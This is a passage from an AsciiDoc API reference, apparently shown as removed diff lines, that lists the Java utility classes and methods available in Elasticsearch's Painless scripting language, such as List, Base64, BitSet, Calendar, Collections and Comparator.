{java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator 
{java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* void {java11-javadoc}/java.base/java/util/ArrayList.html#trimToSize()[trimToSize]() - - -[[painless-api-reference-shared-Arrays]] -==== Arrays -* static List {java11-javadoc}/java.base/java/util/Arrays.html#asList(java.lang.Object%5B%5D)[asList](Object[]) -* static boolean {java11-javadoc}/java.base/java/util/Arrays.html#deepEquals(java.lang.Object%5B%5D,java.lang.Object%5B%5D)[deepEquals](Object[], Object[]) -* static int {java11-javadoc}/java.base/java/util/Arrays.html#deepHashCode(java.lang.Object%5B%5D)[deepHashCode](Object[]) -* static null {java11-javadoc}/java.base/java/util/Arrays.html#deepToString(java.lang.Object%5B%5D)[deepToString](Object[]) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Base64]] -==== Base64 -* static Base64.Decoder {java11-javadoc}/java.base/java/util/Base64.html#getDecoder()[getDecoder]() -* static Base64.Encoder {java11-javadoc}/java.base/java/util/Base64.html#getEncoder()[getEncoder]() -* static Base64.Decoder {java11-javadoc}/java.base/java/util/Base64.html#getMimeDecoder()[getMimeDecoder]() -* static Base64.Encoder {java11-javadoc}/java.base/java/util/Base64.html#getMimeEncoder()[getMimeEncoder]() -* static Base64.Encoder {java11-javadoc}/java.base/java/util/Base64.html#getMimeEncoder(int,byte%5B%5D)[getMimeEncoder](int, byte[]) -* static Base64.Decoder {java11-javadoc}/java.base/java/util/Base64.html#getUrlDecoder()[getUrlDecoder]() -* static Base64.Encoder {java11-javadoc}/java.base/java/util/Base64.html#getUrlEncoder()[getUrlEncoder]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Base64-Decoder]] -==== Base64.Decoder -* byte[] {java11-javadoc}/java.base/java/util/Base64$Decoder.html#decode(java.lang.String)[decode](null) -* int {java11-javadoc}/java.base/java/util/Base64$Decoder.html#decode(byte%5B%5D,byte%5B%5D)[decode](byte[], byte[]) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Base64-Encoder]] -==== Base64.Encoder -* int {java11-javadoc}/java.base/java/util/Base64$Encoder.html#encode(byte%5B%5D,byte%5B%5D)[encode](byte[], byte[]) -* null {java11-javadoc}/java.base/java/util/Base64$Encoder.html#encodeToString(byte%5B%5D)[encodeToString](byte[]) -* boolean 
{java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* Base64.Encoder {java11-javadoc}/java.base/java/util/Base64$Encoder.html#withoutPadding()[withoutPadding]() - - -[[painless-api-reference-shared-BitSet]] -==== BitSet -* static BitSet {java11-javadoc}/java.base/java/util/BitSet.html#valueOf(long%5B%5D)[valueOf](long[]) -* {java11-javadoc}/java.base/java/util/BitSet.html#()[BitSet]() -* {java11-javadoc}/java.base/java/util/BitSet.html#(int)[BitSet](int) -* void {java11-javadoc}/java.base/java/util/BitSet.html#and(java.util.BitSet)[and](BitSet) -* void {java11-javadoc}/java.base/java/util/BitSet.html#andNot(java.util.BitSet)[andNot](BitSet) -* int {java11-javadoc}/java.base/java/util/BitSet.html#cardinality()[cardinality]() -* void {java11-javadoc}/java.base/java/util/BitSet.html#clear()[clear]() -* void {java11-javadoc}/java.base/java/util/BitSet.html#clear(int)[clear](int) -* void {java11-javadoc}/java.base/java/util/BitSet.html#clear(int,int)[clear](int, int) -* def {java11-javadoc}/java.base/java/util/BitSet.html#clone()[clone]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* void {java11-javadoc}/java.base/java/util/BitSet.html#flip(int)[flip](int) -* void {java11-javadoc}/java.base/java/util/BitSet.html#flip(int,int)[flip](int, int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/BitSet.html#intersects(java.util.BitSet)[intersects](BitSet) -* boolean {java11-javadoc}/java.base/java/util/BitSet.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/util/BitSet.html#length()[length]() -* int {java11-javadoc}/java.base/java/util/BitSet.html#nextClearBit(int)[nextClearBit](int) -* int {java11-javadoc}/java.base/java/util/BitSet.html#nextSetBit(int)[nextSetBit](int) -* void {java11-javadoc}/java.base/java/util/BitSet.html#or(java.util.BitSet)[or](BitSet) -* int {java11-javadoc}/java.base/java/util/BitSet.html#previousClearBit(int)[previousClearBit](int) -* int {java11-javadoc}/java.base/java/util/BitSet.html#previousSetBit(int)[previousSetBit](int) -* void {java11-javadoc}/java.base/java/util/BitSet.html#set(int)[set](int) -* void {java11-javadoc}/java.base/java/util/BitSet.html#set(int,int)[set](int, int) -* void {java11-javadoc}/java.base/java/util/BitSet.html#set(int,int,boolean)[set](int, int, boolean) -* int {java11-javadoc}/java.base/java/util/BitSet.html#size()[size]() -* byte[] {java11-javadoc}/java.base/java/util/BitSet.html#toByteArray()[toByteArray]() -* long[] {java11-javadoc}/java.base/java/util/BitSet.html#toLongArray()[toLongArray]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* void {java11-javadoc}/java.base/java/util/BitSet.html#xor(java.util.BitSet)[xor](BitSet) - - -[[painless-api-reference-shared-Calendar]] -==== Calendar -* static int {java11-javadoc}/java.base/java/util/Calendar.html#ALL_STYLES[ALL_STYLES] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#AM[AM] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#AM_PM[AM_PM] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#APRIL[APRIL] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#AUGUST[AUGUST] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#DATE[DATE] -* static 
int {java11-javadoc}/java.base/java/util/Calendar.html#DAY_OF_MONTH[DAY_OF_MONTH] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#DAY_OF_WEEK[DAY_OF_WEEK] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#DAY_OF_WEEK_IN_MONTH[DAY_OF_WEEK_IN_MONTH] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#DAY_OF_YEAR[DAY_OF_YEAR] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#DECEMBER[DECEMBER] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#DST_OFFSET[DST_OFFSET] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#ERA[ERA] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#FEBRUARY[FEBRUARY] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#FIELD_COUNT[FIELD_COUNT] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#FRIDAY[FRIDAY] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#HOUR[HOUR] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#HOUR_OF_DAY[HOUR_OF_DAY] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#JANUARY[JANUARY] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#JULY[JULY] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#JUNE[JUNE] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#LONG[LONG] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#LONG_FORMAT[LONG_FORMAT] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#LONG_STANDALONE[LONG_STANDALONE] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#MARCH[MARCH] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#MAY[MAY] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#MILLISECOND[MILLISECOND] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#MINUTE[MINUTE] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#MONDAY[MONDAY] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#MONTH[MONTH] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#NARROW_FORMAT[NARROW_FORMAT] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#NARROW_STANDALONE[NARROW_STANDALONE] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#NOVEMBER[NOVEMBER] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#OCTOBER[OCTOBER] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#PM[PM] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#SATURDAY[SATURDAY] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#SECOND[SECOND] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#SEPTEMBER[SEPTEMBER] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#SHORT[SHORT] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#SHORT_FORMAT[SHORT_FORMAT] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#SHORT_STANDALONE[SHORT_STANDALONE] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#SUNDAY[SUNDAY] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#THURSDAY[THURSDAY] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#TUESDAY[TUESDAY] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#UNDECIMBER[UNDECIMBER] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#WEDNESDAY[WEDNESDAY] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#WEEK_OF_MONTH[WEEK_OF_MONTH] -* static int 
{java11-javadoc}/java.base/java/util/Calendar.html#WEEK_OF_YEAR[WEEK_OF_YEAR] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#YEAR[YEAR] -* static int {java11-javadoc}/java.base/java/util/Calendar.html#ZONE_OFFSET[ZONE_OFFSET] -* static Set {java11-javadoc}/java.base/java/util/Calendar.html#getAvailableCalendarTypes()[getAvailableCalendarTypes]() -* static Locale[] {java11-javadoc}/java.base/java/util/Calendar.html#getAvailableLocales()[getAvailableLocales]() -* static Calendar {java11-javadoc}/java.base/java/util/Calendar.html#getInstance()[getInstance]() -* static Calendar {java11-javadoc}/java.base/java/util/Calendar.html#getInstance(java.util.TimeZone)[getInstance](TimeZone) -* static Calendar {java11-javadoc}/java.base/java/util/Calendar.html#getInstance(java.util.TimeZone,java.util.Locale)[getInstance](TimeZone, Locale) -* void {java11-javadoc}/java.base/java/util/Calendar.html#add(int,int)[add](int, int) -* boolean {java11-javadoc}/java.base/java/util/Calendar.html#after(java.lang.Object)[after](Object) -* boolean {java11-javadoc}/java.base/java/util/Calendar.html#before(java.lang.Object)[before](Object) -* void {java11-javadoc}/java.base/java/util/Calendar.html#clear()[clear]() -* void {java11-javadoc}/java.base/java/util/Calendar.html#clear(int)[clear](int) -* def {java11-javadoc}/java.base/java/util/Calendar.html#clone()[clone]() -* int {java11-javadoc}/java.base/java/util/Calendar.html#compareTo(java.util.Calendar)[compareTo](Calendar) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/util/Calendar.html#get(int)[get](int) -* int {java11-javadoc}/java.base/java/util/Calendar.html#getActualMaximum(int)[getActualMaximum](int) -* int {java11-javadoc}/java.base/java/util/Calendar.html#getActualMinimum(int)[getActualMinimum](int) -* null {java11-javadoc}/java.base/java/util/Calendar.html#getCalendarType()[getCalendarType]() -* null {java11-javadoc}/java.base/java/util/Calendar.html#getDisplayName(int,int,java.util.Locale)[getDisplayName](int, int, Locale) -* Map {java11-javadoc}/java.base/java/util/Calendar.html#getDisplayNames(int,int,java.util.Locale)[getDisplayNames](int, int, Locale) -* int {java11-javadoc}/java.base/java/util/Calendar.html#getFirstDayOfWeek()[getFirstDayOfWeek]() -* int {java11-javadoc}/java.base/java/util/Calendar.html#getGreatestMinimum(int)[getGreatestMinimum](int) -* int {java11-javadoc}/java.base/java/util/Calendar.html#getLeastMaximum(int)[getLeastMaximum](int) -* int {java11-javadoc}/java.base/java/util/Calendar.html#getMaximum(int)[getMaximum](int) -* int {java11-javadoc}/java.base/java/util/Calendar.html#getMinimalDaysInFirstWeek()[getMinimalDaysInFirstWeek]() -* int {java11-javadoc}/java.base/java/util/Calendar.html#getMinimum(int)[getMinimum](int) -* Date {java11-javadoc}/java.base/java/util/Calendar.html#getTime()[getTime]() -* long {java11-javadoc}/java.base/java/util/Calendar.html#getTimeInMillis()[getTimeInMillis]() -* TimeZone {java11-javadoc}/java.base/java/util/Calendar.html#getTimeZone()[getTimeZone]() -* int {java11-javadoc}/java.base/java/util/Calendar.html#getWeekYear()[getWeekYear]() -* int {java11-javadoc}/java.base/java/util/Calendar.html#getWeeksInWeekYear()[getWeeksInWeekYear]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Calendar.html#isLenient()[isLenient]() -* boolean {java11-javadoc}/java.base/java/util/Calendar.html#isSet(int)[isSet](int) -* 
boolean {java11-javadoc}/java.base/java/util/Calendar.html#isWeekDateSupported()[isWeekDateSupported]() -* void {java11-javadoc}/java.base/java/util/Calendar.html#roll(int,int)[roll](int, int) -* void {java11-javadoc}/java.base/java/util/Calendar.html#set(int,int)[set](int, int) -* void {java11-javadoc}/java.base/java/util/Calendar.html#set(int,int,int)[set](int, int, int) -* void {java11-javadoc}/java.base/java/util/Calendar.html#set(int,int,int,int,int)[set](int, int, int, int, int) -* void {java11-javadoc}/java.base/java/util/Calendar.html#set(int,int,int,int,int,int)[set](int, int, int, int, int, int) -* void {java11-javadoc}/java.base/java/util/Calendar.html#setFirstDayOfWeek(int)[setFirstDayOfWeek](int) -* void {java11-javadoc}/java.base/java/util/Calendar.html#setLenient(boolean)[setLenient](boolean) -* void {java11-javadoc}/java.base/java/util/Calendar.html#setMinimalDaysInFirstWeek(int)[setMinimalDaysInFirstWeek](int) -* void {java11-javadoc}/java.base/java/util/Calendar.html#setTime(java.util.Date)[setTime](Date) -* void {java11-javadoc}/java.base/java/util/Calendar.html#setTimeInMillis(long)[setTimeInMillis](long) -* void {java11-javadoc}/java.base/java/util/Calendar.html#setTimeZone(java.util.TimeZone)[setTimeZone](TimeZone) -* void {java11-javadoc}/java.base/java/util/Calendar.html#setWeekDate(int,int,int)[setWeekDate](int, int, int) -* Instant {java11-javadoc}/java.base/java/util/Calendar.html#toInstant()[toInstant]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Calendar-Builder]] -==== Calendar.Builder -* {java11-javadoc}/java.base/java/util/Calendar$Builder.html#()[Calendar.Builder]() -* Calendar {java11-javadoc}/java.base/java/util/Calendar$Builder.html#build()[build]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Calendar.Builder {java11-javadoc}/java.base/java/util/Calendar$Builder.html#set(int,int)[set](int, int) -* Calendar.Builder {java11-javadoc}/java.base/java/util/Calendar$Builder.html#setCalendarType(java.lang.String)[setCalendarType](null) -* Calendar.Builder {java11-javadoc}/java.base/java/util/Calendar$Builder.html#setDate(int,int,int)[setDate](int, int, int) -* Calendar.Builder {java11-javadoc}/java.base/java/util/Calendar$Builder.html#setFields(int%5B%5D)[setFields](int[]) -* Calendar.Builder {java11-javadoc}/java.base/java/util/Calendar$Builder.html#setInstant(long)[setInstant](long) -* Calendar.Builder {java11-javadoc}/java.base/java/util/Calendar$Builder.html#setLenient(boolean)[setLenient](boolean) -* Calendar.Builder {java11-javadoc}/java.base/java/util/Calendar$Builder.html#setLocale(java.util.Locale)[setLocale](Locale) -* Calendar.Builder {java11-javadoc}/java.base/java/util/Calendar$Builder.html#setTimeOfDay(int,int,int)[setTimeOfDay](int, int, int) -* Calendar.Builder {java11-javadoc}/java.base/java/util/Calendar$Builder.html#setTimeOfDay(int,int,int,int)[setTimeOfDay](int, int, int, int) -* Calendar.Builder {java11-javadoc}/java.base/java/util/Calendar$Builder.html#setTimeZone(java.util.TimeZone)[setTimeZone](TimeZone) -* Calendar.Builder {java11-javadoc}/java.base/java/util/Calendar$Builder.html#setWeekDate(int,int,int)[setWeekDate](int, int, int) -* Calendar.Builder {java11-javadoc}/java.base/java/util/Calendar$Builder.html#setWeekDefinition(int,int)[setWeekDefinition](int, int) -* null 
{java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Collection]] -==== Collection -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Collections]] -==== Collections -* static List {java11-javadoc}/java.base/java/util/Collections.html#EMPTY_LIST[EMPTY_LIST] -* static Map {java11-javadoc}/java.base/java/util/Collections.html#EMPTY_MAP[EMPTY_MAP] -* static Set {java11-javadoc}/java.base/java/util/Collections.html#EMPTY_SET[EMPTY_SET] -* static boolean {java11-javadoc}/java.base/java/util/Collections.html#addAll(java.util.Collection,java.lang.Object%5B%5D)[addAll](Collection, def[]) -* static Queue {java11-javadoc}/java.base/java/util/Collections.html#asLifoQueue(java.util.Deque)[asLifoQueue](Deque) -* static int {java11-javadoc}/java.base/java/util/Collections.html#binarySearch(java.util.List,java.lang.Object)[binarySearch](List, def) -* static int {java11-javadoc}/java.base/java/util/Collections.html#binarySearch(java.util.List,java.lang.Object,java.util.Comparator)[binarySearch](List, def, Comparator) -* static void {java11-javadoc}/java.base/java/util/Collections.html#copy(java.util.List,java.util.List)[copy](List, List) -* static boolean 
{java11-javadoc}/java.base/java/util/Collections.html#disjoint(java.util.Collection,java.util.Collection)[disjoint](Collection, Collection) -* static Enumeration {java11-javadoc}/java.base/java/util/Collections.html#emptyEnumeration()[emptyEnumeration]() -* static Iterator {java11-javadoc}/java.base/java/util/Collections.html#emptyIterator()[emptyIterator]() -* static List {java11-javadoc}/java.base/java/util/Collections.html#emptyList()[emptyList]() -* static ListIterator {java11-javadoc}/java.base/java/util/Collections.html#emptyListIterator()[emptyListIterator]() -* static Map {java11-javadoc}/java.base/java/util/Collections.html#emptyMap()[emptyMap]() -* static NavigableMap {java11-javadoc}/java.base/java/util/Collections.html#emptyNavigableMap()[emptyNavigableMap]() -* static NavigableSet {java11-javadoc}/java.base/java/util/Collections.html#emptyNavigableSet()[emptyNavigableSet]() -* static Set {java11-javadoc}/java.base/java/util/Collections.html#emptySet()[emptySet]() -* static SortedMap {java11-javadoc}/java.base/java/util/Collections.html#emptySortedMap()[emptySortedMap]() -* static SortedSet {java11-javadoc}/java.base/java/util/Collections.html#emptySortedSet()[emptySortedSet]() -* static Enumeration {java11-javadoc}/java.base/java/util/Collections.html#enumeration(java.util.Collection)[enumeration](Collection) -* static void {java11-javadoc}/java.base/java/util/Collections.html#fill(java.util.List,java.lang.Object)[fill](List, def) -* static int {java11-javadoc}/java.base/java/util/Collections.html#frequency(java.util.Collection,java.lang.Object)[frequency](Collection, def) -* static int {java11-javadoc}/java.base/java/util/Collections.html#indexOfSubList(java.util.List,java.util.List)[indexOfSubList](List, List) -* static int {java11-javadoc}/java.base/java/util/Collections.html#lastIndexOfSubList(java.util.List,java.util.List)[lastIndexOfSubList](List, List) -* static ArrayList {java11-javadoc}/java.base/java/util/Collections.html#list(java.util.Enumeration)[list](Enumeration) -* static def {java11-javadoc}/java.base/java/util/Collections.html#max(java.util.Collection)[max](Collection) -* static def {java11-javadoc}/java.base/java/util/Collections.html#max(java.util.Collection,java.util.Comparator)[max](Collection, Comparator) -* static def {java11-javadoc}/java.base/java/util/Collections.html#min(java.util.Collection)[min](Collection) -* static def {java11-javadoc}/java.base/java/util/Collections.html#min(java.util.Collection,java.util.Comparator)[min](Collection, Comparator) -* static List {java11-javadoc}/java.base/java/util/Collections.html#nCopies(int,java.lang.Object)[nCopies](int, def) -* static Set {java11-javadoc}/java.base/java/util/Collections.html#newSetFromMap(java.util.Map)[newSetFromMap](Map) -* static boolean {java11-javadoc}/java.base/java/util/Collections.html#replaceAll(java.util.List,java.lang.Object,java.lang.Object)[replaceAll](List, def, def) -* static void {java11-javadoc}/java.base/java/util/Collections.html#reverse(java.util.List)[reverse](List) -* static Comparator {java11-javadoc}/java.base/java/util/Collections.html#reverseOrder()[reverseOrder]() -* static Comparator {java11-javadoc}/java.base/java/util/Collections.html#reverseOrder(java.util.Comparator)[reverseOrder](Comparator) -* static void {java11-javadoc}/java.base/java/util/Collections.html#rotate(java.util.List,int)[rotate](List, int) -* static void {java11-javadoc}/java.base/java/util/Collections.html#shuffle(java.util.List)[shuffle](List) -* static void 
{java11-javadoc}/java.base/java/util/Collections.html#shuffle(java.util.List,java.util.Random)[shuffle](List, Random) -* static Set {java11-javadoc}/java.base/java/util/Collections.html#singleton(java.lang.Object)[singleton](def) -* static List {java11-javadoc}/java.base/java/util/Collections.html#singletonList(java.lang.Object)[singletonList](def) -* static Map {java11-javadoc}/java.base/java/util/Collections.html#singletonMap(java.lang.Object,java.lang.Object)[singletonMap](def, def) -* static void {java11-javadoc}/java.base/java/util/Collections.html#sort(java.util.List)[sort](List) -* static void {java11-javadoc}/java.base/java/util/Collections.html#sort(java.util.List,java.util.Comparator)[sort](List, Comparator) -* static void {java11-javadoc}/java.base/java/util/Collections.html#swap(java.util.List,int,int)[swap](List, int, int) -* static Collection {java11-javadoc}/java.base/java/util/Collections.html#unmodifiableCollection(java.util.Collection)[unmodifiableCollection](Collection) -* static List {java11-javadoc}/java.base/java/util/Collections.html#unmodifiableList(java.util.List)[unmodifiableList](List) -* static Map {java11-javadoc}/java.base/java/util/Collections.html#unmodifiableMap(java.util.Map)[unmodifiableMap](Map) -* static NavigableMap {java11-javadoc}/java.base/java/util/Collections.html#unmodifiableNavigableMap(java.util.NavigableMap)[unmodifiableNavigableMap](NavigableMap) -* static NavigableSet {java11-javadoc}/java.base/java/util/Collections.html#unmodifiableNavigableSet(java.util.NavigableSet)[unmodifiableNavigableSet](NavigableSet) -* static Set {java11-javadoc}/java.base/java/util/Collections.html#unmodifiableSet(java.util.Set)[unmodifiableSet](Set) -* static SortedMap {java11-javadoc}/java.base/java/util/Collections.html#unmodifiableSortedMap(java.util.SortedMap)[unmodifiableSortedMap](SortedMap) -* static SortedSet {java11-javadoc}/java.base/java/util/Collections.html#unmodifiableSortedSet(java.util.SortedSet)[unmodifiableSortedSet](SortedSet) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Comparator]] -==== Comparator -* static Comparator {java11-javadoc}/java.base/java/util/Comparator.html#comparing(java.util.function.Function)[comparing](Function) -* static Comparator {java11-javadoc}/java.base/java/util/Comparator.html#comparing(java.util.function.Function,java.util.Comparator)[comparing](Function, Comparator) -* static Comparator {java11-javadoc}/java.base/java/util/Comparator.html#comparingDouble(java.util.function.ToDoubleFunction)[comparingDouble](ToDoubleFunction) -* static Comparator {java11-javadoc}/java.base/java/util/Comparator.html#comparingInt(java.util.function.ToIntFunction)[comparingInt](ToIntFunction) -* static Comparator {java11-javadoc}/java.base/java/util/Comparator.html#comparingLong(java.util.function.ToLongFunction)[comparingLong](ToLongFunction) -* static Comparator {java11-javadoc}/java.base/java/util/Comparator.html#naturalOrder()[naturalOrder]() -* static Comparator {java11-javadoc}/java.base/java/util/Comparator.html#nullsFirst(java.util.Comparator)[nullsFirst](Comparator) -* static Comparator {java11-javadoc}/java.base/java/util/Comparator.html#nullsLast(java.util.Comparator)[nullsLast](Comparator) -* static Comparator 
{java11-javadoc}/java.base/java/util/Comparator.html#reverseOrder()[reverseOrder]() -* int {java11-javadoc}/java.base/java/util/Comparator.html#compare(java.lang.Object,java.lang.Object)[compare](def, def) -* boolean {java11-javadoc}/java.base/java/util/Comparator.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#reversed()[reversed]() -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#thenComparing(java.util.Comparator)[thenComparing](Comparator) -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#thenComparing(java.util.function.Function,java.util.Comparator)[thenComparing](Function, Comparator) -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#thenComparingDouble(java.util.function.ToDoubleFunction)[thenComparingDouble](ToDoubleFunction) -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#thenComparingInt(java.util.function.ToIntFunction)[thenComparingInt](ToIntFunction) -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#thenComparingLong(java.util.function.ToLongFunction)[thenComparingLong](ToLongFunction) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ConcurrentModificationException]] -==== ConcurrentModificationException -* {java11-javadoc}/java.base/java/util/ConcurrentModificationException.html#()[ConcurrentModificationException]() -* {java11-javadoc}/java.base/java/util/ConcurrentModificationException.html#(java.lang.String)[ConcurrentModificationException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null 